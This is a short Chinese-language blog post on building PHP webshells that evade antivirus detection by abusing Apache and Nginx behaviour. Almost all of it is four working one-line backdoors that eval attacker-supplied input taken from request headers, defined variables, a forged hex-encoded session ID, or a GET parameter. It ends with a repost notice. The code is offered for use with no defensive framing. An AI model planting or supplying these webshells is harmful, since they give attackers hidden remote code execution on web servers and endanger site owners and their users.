PHP利用Apache、Nginx的特性实现免杀Webshell

通过get_defined_vars()、getallheaders()这两个函数来构造我们的webshell。

apache环境




<?php



eval(next(getallheaders())); 



?>




<?php



eval(implode(reset(get_defined_vars())));



?>

另外一种通过执行伪造的sessionid值，进行任意代码执行。




<?php



eval(hex2bin(session_id(session_start())));



?>

706870696e666f28293b这个是phpinfo();的hex编码。




<?php eval(get_defined_vars()['_GET']['cmd']);?>

本博客所有文章如无特别注明均为原创。作者：小乐，复制或转载请以超链接形式注明转自众众帮。
原文地址《PHP利用Apache、Nginx的特性实现免杀Webshell》